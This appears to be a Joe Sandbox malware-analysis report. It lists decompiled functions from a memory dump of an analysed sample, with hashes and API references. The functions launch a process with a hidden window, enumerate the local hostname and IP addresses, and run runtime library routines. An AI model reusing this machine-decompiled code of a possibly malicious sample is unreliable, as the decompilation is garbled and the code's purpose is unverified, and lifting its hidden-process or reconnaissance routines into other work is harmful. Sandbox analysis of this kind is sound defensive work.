Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: gfff$gfff$gfff$gfff
API String ID: 118556049-2178600047
Opcode ID: 660a7f08c6d6a054ff87ef6ff565c5be5ce7da7db38893549e87f5495dd229ed
Instruction ID: 2b9f32df7e43e4de36547ce154d06009a52a786f2a98089a16a4819eb52d5e97
Opcode Fuzzy Hash: 660a7f08c6d6a054ff87ef6ff565c5be5ce7da7db38893549e87f5495dd229ed
Instruction Fuzzy Hash: B7418CB1A001069FDB0CDF6EE990969FBA5FF88304B158269D81ADB345D730FA55CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 012FB1E0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49
processsynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 33%

			E012FB1E0(WCHAR* _a4) {
				signed int _v12;
				struct _STARTUPINFOW _v88;
				struct _PROCESS_INFORMATION _v104;
				signed int _t11;
				WCHAR* _t13;
				void* _t23;
				signed int _t24;

				_t11 =  *0x13a4018; // 0x39cca9f6
				_v12 = _t11 ^ _t24;
				_t13 = _a4;
				asm("xorps xmm0, xmm0");
				asm("movlpd [ebp-0x50], xmm0");
				asm("movlpd [ebp-0x48], xmm0");
				asm("movlpd [ebp-0x40], xmm0");
				asm("movlpd [ebp-0x38], xmm0");
				asm("movlpd [ebp-0x30], xmm0");
				asm("movlpd [ebp-0x28], xmm0");
				asm("movlpd [ebp-0x20], xmm0");
				asm("movlpd [ebp-0x18], xmm0");
				asm("movups [ebp-0x64], xmm0");
				_v88.cb = 0x44;
				if(_t13[0xa] >= 8) {
					_t13 =  *_t13;
				}
				if(CreateProcessW(0, _t13, 0, 0, 1, 0x8000000, 0, 0,  &_v88,  &_v104) != 0) {
					WaitForSingleObject(_v104.hThread, 0xffffffff);
					CloseHandle(_v104);
					CloseHandle(_v104.hThread);
				}
				return E0132EA79(_v12 ^ _t24, _t23);
			}

0x012fb1e6
0x012fb1ed
0x012fb1f0
0x012fb1f3
0x012fb1f6
0x012fb1fb
0x012fb200
0x012fb209
0x012fb20e
0x012fb213
0x012fb218
0x012fb21d
0x012fb222
0x012fb226
0x012fb22d
0x012fb22f
0x012fb22f
0x012fb253
0x012fb25a
0x012fb263
0x012fb26c
0x012fb26c
0x012fb27f

APIs

CreateProcessW.KERNEL32 ref: 012FB24B
WaitForSingleObject.KERNEL32(?,000000FF), ref: 012FB25A
CloseHandle.KERNEL32(?), ref: 012FB263
CloseHandle.KERNEL32(?), ref: 012FB26C

Strings

D, xrefs: 012FB226

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CloseHandle$CreateObjectProcessSingleWait
String ID: D
API String ID: 2059082233-2746444292
Opcode ID: 7446030830ccddc24d851f7d64104d035b876b95ae40f27ac261dbebb4bcee91
Instruction ID: 91f55a78134b9cfb65ef15e922d9cdfe8d7db7ca2d1523929cdd3c3645a0acbe
Opcode Fuzzy Hash: 7446030830ccddc24d851f7d64104d035b876b95ae40f27ac261dbebb4bcee91
Instruction Fuzzy Hash: 07115B32D2034DABDB20DFD4CD45BADBBB5FBA9304F205319F6056A098DBB06994CB44

Uniqueness

Uniqueness Score: -1.00%

Function 01352C5B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E01352C5B(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x1374358(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x01352c61
0x01352c65
0x01352c70
0x01352c78
0x01352c83
0x01352c89
0x01352c8d
0x01352c94
0x01352c9a
0x01352c9a
0x01352c9c
0x01352ca1
0x00000000
0x01352ca6
0x01352cad

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,01352C50,?,?,01352C18,?,?,?), ref: 01352C70
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 01352C83
FreeLibrary.KERNEL32(00000000,?,?,01352C50,?,?,01352C18,?,?,?), ref: 01352CA6

Strings

mscoree.dll, xrefs: 01352C69
CorExitProcess, xrefs: 01352C7B

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f28e0b95885fee7ff966029604368f2d2b58ee3708218448e67281da950e3fb9
Instruction ID: 1cdfeda38959c29794ada6915ce9d985fe0283e9300990c4258f6e48ee9ccde4
Opcode Fuzzy Hash: f28e0b95885fee7ff966029604368f2d2b58ee3708218448e67281da950e3fb9
Instruction Fuzzy Hash: 57F01C31A40219FBEB31AB96E909F9EBF78EB04B59F150064E905A2251CB74AA11DB90

Uniqueness

Uniqueness Score: -1.00%

Function 012F6FE0, Relevance: 7.7, APIs: 5, Instructions: 164
networkCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E012F6FE0(void* __ebx, void* __edi, intOrPtr* _a4) {
				char _v8;
				char _v16;
				signed int _v20;
				char _v280;
				char _v284;
				char _v288;
				char _v292;
				signed int _v296;
				char _v300;
				short _v316;
				char _v716;
				intOrPtr* _v720;
				intOrPtr* _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				char _v736;
				char _v752;
				void* __esi;
				void* __ebp;
				signed int _t64;
				signed int _t65;
				char* _t69;
				char* _t76;
				intOrPtr* _t79;
				intOrPtr _t86;
				signed int _t87;
				intOrPtr _t92;
				void* _t96;
				intOrPtr _t105;
				intOrPtr* _t115;
				void* _t116;
				intOrPtr* _t117;
				void* _t118;
				short _t119;
				signed int _t120;
				void* _t121;
				void* _t123;
				void* _t124;

				_t113 = __edi;
				_t96 = __ebx;
				_t64 =  *0x13a4018; // 0x39cca9f6
				_t65 = _t64 ^ _t120;
				_v20 = _t65;
				 *[fs:0x0] =  &_v16;
				_t117 = _a4;
				asm("xorps xmm0, xmm0");
				asm("movq [ebp-0x120], xmm0");
				_v284 = 0;
				_v720 = _t117;
				_v724 = _t117;
				_v292 = 0;
				_v288 = 0;
				_v284 = 0;
				_v8 = 0;
				E013478D0(__edi,  &_v716, 0, 0x190);
				_t123 = _t121 - 0x2e0 + 0xc;
				_t69 =  &_v716;
				__imp__#115(0x202, _t69, _t65, __edi, _t116,  *[fs:0x0], 0x1365676, 0xffffffff);
				if(_t69 != 0) {
					L21:
					 *_t117 = _v292;
					 *((intOrPtr*)(_t117 + 4)) = _v288;
					 *((intOrPtr*)(_t117 + 8)) = _v284;
					 *[fs:0x0] = _v16;
					_pop(_t118);
					return E0132EA79(_v20 ^ _t120, _t118);
				}
				E013478D0(_t113,  &_v280, _t69, 0x104);
				_t124 = _t123 + 0xc;
				if(gethostname( &_v280, 0x104) == 0xffffffff) {
					L20:
					__imp__#116();
					goto L21;
				}
				_t76 =  &_v280;
				__imp__#52(_t76);
				_v724 = _t76;
				if(_t76 == 0) {
					goto L20;
				}
				_t115 =  *((intOrPtr*)(_t76 + 0xc));
				_t119 = 0;
				if( *((short*)(_t76 + 0xa)) - 1 <= 0) {
					L19:
					_t117 = _v720;
					goto L20;
				} else {
					goto L4;
				}
				while(1) {
					L4:
					_t79 =  *_t115;
					if(_t79 == 0) {
						goto L19;
					}
					_t115 = _t115 + 4;
					__imp__#12( *_t79);
					_t111 = _t79;
					if(_t79 == 0) {
						L18:
						_t119 = _t119 + 1;
						if(_t119 <  *((short*)(_v724 + 0xa)) - 1) {
							continue;
						}
						goto L19;
					}
					_t19 = _t79 + 1; // 0x1
					_v736 = 0;
					_v732 = 0xf;
					_v752 = 0;
					_v728 = _t19;
					do {
						_t105 =  *_t79;
						_t79 = _t79 + 1;
					} while (_t105 != 0);
					_push(_t79 - _v728);
					E012F7F00(_t96,  &_v752, _t111, _t115, _t111);
					_v8 = 1;
					E012F6730(_t96,  &_v316,  &_v752, _t115);
					_v8 = 3;
					_t86 = _v732;
					if(_t86 >= 0x10) {
						_push(_t86 + 1);
						E012F56A0(_t96, _t115, _v752);
						_t124 = _t124 + 8;
					}
					_v736 = 0;
					_v732 = 0xf;
					_v752 = 0;
					if(_v300 == 0 || E012F72A0(_t96, _t115,  &_v316,  &_v316) == 0) {
						L15:
						_t87 = _v296;
						goto L16;
					} else {
						_t92 = _v288;
						if(_t92 == _v284) {
							_push( &_v316);
							E012F54C0(_t96,  &_v292, _t115, _t119, _t92);
							goto L15;
						}
						 *((intOrPtr*)(_t92 + 0x10)) = 0;
						 *((intOrPtr*)(_t92 + 0x14)) = 0;
						asm("movups xmm0, [ebp-0x138]");
						asm("movups [eax], xmm0");
						asm("movq xmm0, [ebp-0x128]");
						asm("movq [eax+0x10], xmm0");
						_t87 = 7;
						_v288 = _v288 + 0x18;
						_v300 = 0;
						_v296 = 7;
						_v316 = 0;
						L16:
						_v8 = 0;
						if(_t87 >= 8) {
							_push(2 + _t87 * 2);
							E012F56A0(_t96, _t115, _v316);
							_t124 = _t124 + 8;
						}
						goto L18;
					}
				}
				goto L19;
			}

0x012f6fe0
0x012f6fe0
0x012f6ff7
0x012f6ffc
0x012f6ffe
0x012f7007
0x012f700d
0x012f7010
0x012f7013
0x012f701b
0x012f7025
0x012f702b
0x012f7031
0x012f703b
0x012f7045
0x012f705a
0x012f7064
0x012f7069
0x012f706c
0x012f7078
0x012f7080
0x012f725f
0x012f7267
0x012f726f
0x012f7278
0x012f727e
0x012f7287
0x012f7295
0x012f7295
0x012f7093
0x012f7098
0x012f70b0
0x012f7259
0x012f7259
0x00000000
0x012f7259
0x012f70b6
0x012f70bd
0x012f70c3
0x012f70cb
0x00000000
0x00000000
0x012f70d1
0x012f70d4
0x012f70dd
0x012f7253
0x012f7253
0x00000000
0x00000000
0x00000000
0x00000000
0x012f70e3
0x012f70e3
0x012f70e3
0x012f70e7
0x00000000
0x00000000
0x012f70ef
0x012f70f2
0x012f70f8
0x012f70fc
0x012f723f
0x012f7245
0x012f724d
0x00000000
0x00000000
0x00000000
0x012f724d
0x012f7102
0x012f7105
0x012f710f
0x012f7119
0x012f7120
0x012f7126
0x012f7126
0x012f7128
0x012f7129
0x012f7139
0x012f713b
0x012f7146
0x012f7150
0x012f7155
0x012f7159
0x012f7162
0x012f7165
0x012f716c
0x012f7171
0x012f7171
0x012f717b
0x012f7185
0x012f718f
0x012f7196
0x012f721a
0x012f721a
0x00000000
0x012f71ad
0x012f71ad
0x012f71b9
0x012f720d
0x012f7215
0x00000000
0x012f7215
0x012f71bb
0x012f71c4
0x012f71cb
0x012f71d2
0x012f71d5
0x012f71dd
0x012f71e2
0x012f71e7
0x012f71ee
0x012f71f8
0x012f71fe
0x012f7220
0x012f7220
0x012f7227
0x012f7230
0x012f7237
0x012f723c
0x012f723c
0x00000000
0x012f7227
0x012f7196
0x00000000

APIs

WSAStartup.WS2_32(00000202,?), ref: 012F7078
gethostname.WS2_32(?,00000104), ref: 012F70A7
gethostbyname.WS2_32(?), ref: 012F70BD
inet_ntoa.WS2_32(?), ref: 012F70F2
WSACleanup.WS2_32 ref: 012F7259

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: CleanupStartupgethostbynamegethostnameinet_ntoa
String ID:
API String ID: 348263315-0
Opcode ID: bca45d4920b9c6df722f894ff1f2aadfff8bc9c992b2a9b227f5cbf8fb5df112
Instruction ID: 8ea3119354f403914351dabdb905fb39968274b2500b2a3d97e37cffacc9f33f
Opcode Fuzzy Hash: bca45d4920b9c6df722f894ff1f2aadfff8bc9c992b2a9b227f5cbf8fb5df112
Instruction Fuzzy Hash: A7715D71C102298BEB24DF54DC48BEDFBB8EF18314F1041E9E608A7291EB749A84CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0131D48D, Relevance: 7.6, APIs: 5, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0131D48D(void* __ecx, intOrPtr _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t17;
				intOrPtr _t19;
				char* _t21;
				short _t28;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t32 = _a8;
				_t31 = __ecx;
				_t29 = __ecx + 0x2c;
				if( *((char*)(__ecx + 0x28)) == 0) {
					_t5 = _t32 + 0x10; // 0x1c4689c0
					_t17 =  *_t5;
				} else {
					_t4 = _t32 + 0xc; // 0xbe0f2947
					_t17 =  *_t4;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = E0131D6EF(_t29, _t31, _t32, _t17, 0, _t29);
				_t19 = 0x13836c2;
				if( *((char*)(_t32 + 0x2e)) <= 4) {
					_t8 = _t32 + 0x20; // 0x47be0f00
					_t19 =  *_t8;
				}
				 *((intOrPtr*)(_t31 + 0x14)) = E0131D6EF(_t29, _t31, _t32, _t19, 0, _t29);
				_t21 = "-";
				if( *((char*)(_t32 + 0x2f)) <= 4) {
					_t11 = _t32 + 0x24; // 0x205e8d2e
					_t21 =  *_t11;
				}
				 *((intOrPtr*)(_t31 + 0x18)) = E0131D6EF(_t29, _t31, _t32, _t21, 0, _t29);
				_t13 = _t32 + 0x14; // 0x578c085
				 *((short*)(_t31 + 0xc)) = E0131D6BE( *( *_t13) & 0x000000ff, 0, _t29);
				_t15 = _t32 + 0x18; // 0x7c7ff883
				_t28 = E0131D6BE( *( *_t15) & 0x000000ff, 0, _t29);
				 *((short*)(_t31 + 0xe)) = _t28;
				return _t28;
			}

0x0131d492
0x0131d496
0x0131d49c
0x0131d49f
0x0131d4a6
0x0131d4a6
0x0131d4a1
0x0131d4a1
0x0131d4a1
0x0131d4a1
0x0131d4b2
0x0131d4bc
0x0131d4c1
0x0131d4c3
0x0131d4c3
0x0131d4c3
0x0131d4cf
0x0131d4d9
0x0131d4de
0x0131d4e0
0x0131d4e0
0x0131d4e0
0x0131d4ec
0x0131d4ef
0x0131d4fe
0x0131d502
0x0131d50c
0x0131d514
0x0131d51c

APIs

_Maklocstr.LIBCPMT ref: 0131D4AD
_Maklocstr.LIBCPMT ref: 0131D4CA
_Maklocstr.LIBCPMT ref: 0131D4E7
_Maklocchr.LIBCPMT ref: 0131D4F9
_Maklocchr.LIBCPMT ref: 0131D50C

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Maklocstr$Maklocchr
String ID:
API String ID: 2020259771-0
Opcode ID: c56b363ca36bcbb50e91c2e2ac19d3289f8cdbaad57dca6ddf32d3d047b481d6
Instruction ID: 27c18c0122f2de82fcd23a61c56bf58091a57b6747e6ba9cec2a0110184047da
Opcode Fuzzy Hash: c56b363ca36bcbb50e91c2e2ac19d3289f8cdbaad57dca6ddf32d3d047b481d6
Instruction Fuzzy Hash: 5311C1B16407457BE720EBE8C884F12B7ECFF05228F040909F249CB640DA74F864C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 0132B008, Relevance: 7.5, APIs: 5, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E0132B008(void* __edx, void* __eflags, void* __fp0) {
				signed int _t107;
				void* _t189;
				signed int _t276;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				void* _t327;

				_t331 = __fp0;
				_push(8);
				E0132F1B6(0x1368615, __eflags);
				E013177B6(_t327 - 0x14, 0);
				_t310 =  *0x13aaaa0; // 0x0
				 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
				 *(_t327 - 0x10) = _t310;
				_t107 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa80));
				_t302 = _t107;
				if(_t107 != 0) {
					L5:
					E0131780E(_t327 - 0x14);
					return E0132F190(_t302, _t330);
				} else {
					_t330 = _t310;
					if(_t310 == 0) {
						_push( *((intOrPtr*)(_t327 + 8)));
						_push(_t327 - 0x10);
						__eflags = E0132B5B7(__edx, _t310, __eflags, __fp0) - 0xffffffff;
						if(__eflags == 0) {
							E012F9060();
							asm("int3");
							_push(8);
							E0132F1B6(0x1368615, __eflags);
							E013177B6(_t327 - 0x14, 0);
							_t311 =  *0x13aaaa4; // 0x0
							 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
							 *(_t327 - 0x10) = _t311;
							_t303 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa84));
							__eflags = _t303;
							if(_t303 != 0) {
								L12:
								E0131780E(_t327 - 0x14);
								return E0132F190(_t303, __eflags);
							} else {
								__eflags = _t311;
								if(__eflags == 0) {
									_push( *((intOrPtr*)(_t327 + 8)));
									_push(_t327 - 0x10);
									__eflags = E0132B659(_t311, __eflags) - 0xffffffff;
									if(__eflags == 0) {
										E012F9060();
										asm("int3");
										_push(8);
										E0132F1B6(0x1368615, __eflags);
										E013177B6(_t327 - 0x14, 0);
										_t312 =  *0x13aaaa8; // 0x0
										 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
										 *(_t327 - 0x10) = _t312;
										_t304 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa88));
										__eflags = _t304;
										if(_t304 != 0) {
											L19:
											E0131780E(_t327 - 0x14);
											return E0132F190(_t304, __eflags);
										} else {
											__eflags = _t312;
											if(__eflags == 0) {
												_push( *((intOrPtr*)(_t327 + 8)));
												_push(_t327 - 0x10);
												__eflags = E0132B6C1(_t312, __eflags) - 0xffffffff;
												if(__eflags == 0) {
													E012F9060();
													asm("int3");
													_push(8);
													E0132F1B6(0x1368615, __eflags);
													E013177B6(_t327 - 0x14, 0);
													_t313 =  *0x13aaaac; // 0x0
													 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
													 *(_t327 - 0x10) = _t313;
													_t305 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa8c));
													__eflags = _t305;
													if(_t305 != 0) {
														L26:
														E0131780E(_t327 - 0x14);
														return E0132F190(_t305, __eflags);
													} else {
														__eflags = _t313;
														if(__eflags == 0) {
															_push( *((intOrPtr*)(_t327 + 8)));
															_push(_t327 - 0x10);
															__eflags = E0132B729(_t313, __eflags) - 0xffffffff;
															if(__eflags == 0) {
																E012F9060();
																asm("int3");
																_push(8);
																E0132F1B6(0x1368615, __eflags);
																E013177B6(_t327 - 0x14, 0);
																_t314 =  *0x13aaab4; // 0x0
																 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
																 *(_t327 - 0x10) = _t314;
																_t306 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa94));
																__eflags = _t306;
																if(_t306 != 0) {
																	L33:
																	E0131780E(_t327 - 0x14);
																	return E0132F190(_t306, __eflags);
																} else {
																	__eflags = _t314;
																	if(__eflags == 0) {
																		_push( *((intOrPtr*)(_t327 + 8)));
																		_push(_t327 - 0x10);
																		__eflags = E0132B791(_t314, __eflags, __fp0) - 0xffffffff;
																		if(__eflags == 0) {
																			E012F9060();
																			asm("int3");
																			_push(8);
																			E0132F1B6(0x1368615, __eflags);
																			E013177B6(_t327 - 0x14, 0);
																			_t315 =  *0x13aaab0; // 0x0
																			 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
																			 *(_t327 - 0x10) = _t315;
																			_t307 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa90));
																			__eflags = _t307;
																			if(_t307 != 0) {
																				L40:
																				E0131780E(_t327 - 0x14);
																				return E0132F190(_t307, __eflags);
																			} else {
																				__eflags = _t315;
																				if(__eflags == 0) {
																					_push( *((intOrPtr*)(_t327 + 8)));
																					_push(_t327 - 0x10);
																					__eflags = E0132B815(_t315, __eflags, __fp0) - 0xffffffff;
																					if(__eflags == 0) {
																						E012F9060();
																						asm("int3");
																						_push(8);
																						E0132F1B6(0x1368615, __eflags);
																						E013177B6(_t327 - 0x14, 0);
																						_t316 =  *0x13aaab8; // 0x0
																						 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
																						 *(_t327 - 0x10) = _t316;
																						_t308 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa98));
																						__eflags = _t308;
																						if(_t308 != 0) {
																							L47:
																							E0131780E(_t327 - 0x14);
																							return E0132F190(_t308, __eflags);
																						} else {
																							__eflags = _t316;
																							if(__eflags == 0) {
																								_push( *((intOrPtr*)(_t327 + 8)));
																								_push(_t327 - 0x10);
																								__eflags = E0132B89A(__eflags, __fp0) - 0xffffffff;
																								if(__eflags == 0) {
																									E012F9060();
																									asm("int3");
																									_push(8);
																									E0132F1B6(0x1368615, __eflags);
																									E013177B6(_t327 - 0x14, 0);
																									_t317 =  *0x13aaabc; // 0x0
																									 *(_t327 - 4) =  *(_t327 - 4) & 0x00000000;
																									 *(_t327 - 0x10) = _t317;
																									_t309 = E012F9A10( *((intOrPtr*)(_t327 + 8)), E012F9850(0x13aaa9c));
																									__eflags = _t309;
																									if(_t309 != 0) {
																										L54:
																										E0131780E(_t327 - 0x14);
																										return E0132F190(_t309, __eflags);
																									} else {
																										__eflags = _t317;
																										if(__eflags == 0) {
																											_push( *((intOrPtr*)(_t327 + 8)));
																											_push(_t327 - 0x10);
																											_t189 = E0132B906(__edx, _t317, __eflags);
																											_pop(_t276);
																											__eflags = _t189 - 0xffffffff;
																											if(__eflags == 0) {
																												E012F9060();
																												asm("int3");
																												_push(4);
																												E0132F1B6(0x1368ad3, __eflags);
																												_t318 = _t276;
																												 *(_t327 - 0x10) = _t318;
																												 *((intOrPtr*)(_t318 + 4)) =  *((intOrPtr*)(_t327 + 0xc));
																												_push( *((intOrPtr*)(_t327 + 8)));
																												_t101 = _t327 - 4;
																												 *_t101 =  *(_t327 - 4) & 0x00000000;
																												__eflags =  *_t101;
																												 *_t318 = 0x1376c58;
																												E0132C81A(_t276, __edx, __eflags, _t331);
																												return E0132F190(_t318, __eflags);
																											} else {
																												_t309 =  *(_t327 - 0x10);
																												 *(_t327 - 0x10) = _t309;
																												 *(_t327 - 4) = 1;
																												E0131792B(__eflags, _t309);
																												 *0x1374358();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
																												 *0x13aaabc = _t309;
																												goto L54;
																											}
																										} else {
																											_t309 = _t317;
																											goto L54;
																										}
																									}
																								} else {
																									_t308 =  *(_t327 - 0x10);
																									 *(_t327 - 0x10) = _t308;
																									 *(_t327 - 4) = 1;
																									E0131792B(__eflags, _t308);
																									 *0x1374358();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
																									 *0x13aaab8 = _t308;
																									goto L47;
																								}
																							} else {
																								_t308 = _t316;
																								goto L47;
																							}
																						}
																					} else {
																						_t307 =  *(_t327 - 0x10);
																						 *(_t327 - 0x10) = _t307;
																						 *(_t327 - 4) = 1;
																						E0131792B(__eflags, _t307);
																						 *0x1374358();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
																						 *0x13aaab0 = _t307;
																						goto L40;
																					}
																				} else {
																					_t307 = _t315;
																					goto L40;
																				}
																			}
																		} else {
																			_t306 =  *(_t327 - 0x10);
																			 *(_t327 - 0x10) = _t306;
																			 *(_t327 - 4) = 1;
																			E0131792B(__eflags, _t306);
																			 *0x1374358();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t306 + 4))))();
																			 *0x13aaab4 = _t306;
																			goto L33;
																		}
																	} else {
																		_t306 = _t314;
																		goto L33;
																	}
																}
															} else {
																_t305 =  *(_t327 - 0x10);
																 *(_t327 - 0x10) = _t305;
																 *(_t327 - 4) = 1;
																E0131792B(__eflags, _t305);
																 *0x1374358();
																 *((intOrPtr*)( *((intOrPtr*)( *_t305 + 4))))();
																 *0x13aaaac = _t305;
																goto L26;
															}
														} else {
															_t305 = _t313;
															goto L26;
														}
													}
												} else {
													_t304 =  *(_t327 - 0x10);
													 *(_t327 - 0x10) = _t304;
													 *(_t327 - 4) = 1;
													E0131792B(__eflags, _t304);
													 *0x1374358();
													 *((intOrPtr*)( *((intOrPtr*)( *_t304 + 4))))();
													 *0x13aaaa8 = _t304;
													goto L19;
												}
											} else {
												_t304 = _t312;
												goto L19;
											}
										}
									} else {
										_t303 =  *(_t327 - 0x10);
										 *(_t327 - 0x10) = _t303;
										 *(_t327 - 4) = 1;
										E0131792B(__eflags, _t303);
										 *0x1374358();
										 *((intOrPtr*)( *((intOrPtr*)( *_t303 + 4))))();
										 *0x13aaaa4 = _t303;
										goto L12;
									}
								} else {
									_t303 = _t311;
									goto L12;
								}
							}
						} else {
							_t302 =  *(_t327 - 0x10);
							 *(_t327 - 0x10) = _t302;
							 *(_t327 - 4) = 1;
							E0131792B(__eflags, _t302);
							 *0x1374358();
							 *((intOrPtr*)( *((intOrPtr*)( *_t302 + 4))))();
							 *0x13aaaa0 = _t302;
							goto L5;
						}
					} else {
						_t302 = _t310;
						goto L5;
					}
				}
			}

0x0132b008
0x0132b008
0x0132b00f
0x0132b019
0x0132b01e
0x0132b029
0x0132b02d
0x0132b039
0x0132b03e
0x0132b042
0x0132b087
0x0132b08a
0x0132b096
0x0132b044
0x0132b044
0x0132b046
0x0132b04c
0x0132b052
0x0132b05a
0x0132b05d
0x0132b097
0x0132b09c
0x0132b09d
0x0132b0a4
0x0132b0ae
0x0132b0b3
0x0132b0be
0x0132b0c2
0x0132b0d3
0x0132b0d5
0x0132b0d7
0x0132b11c
0x0132b11f
0x0132b12b
0x0132b0d9
0x0132b0d9
0x0132b0db
0x0132b0e1
0x0132b0e7
0x0132b0ef
0x0132b0f2
0x0132b12c
0x0132b131
0x0132b132
0x0132b139
0x0132b143
0x0132b148
0x0132b153
0x0132b157
0x0132b168
0x0132b16a
0x0132b16c
0x0132b1b1
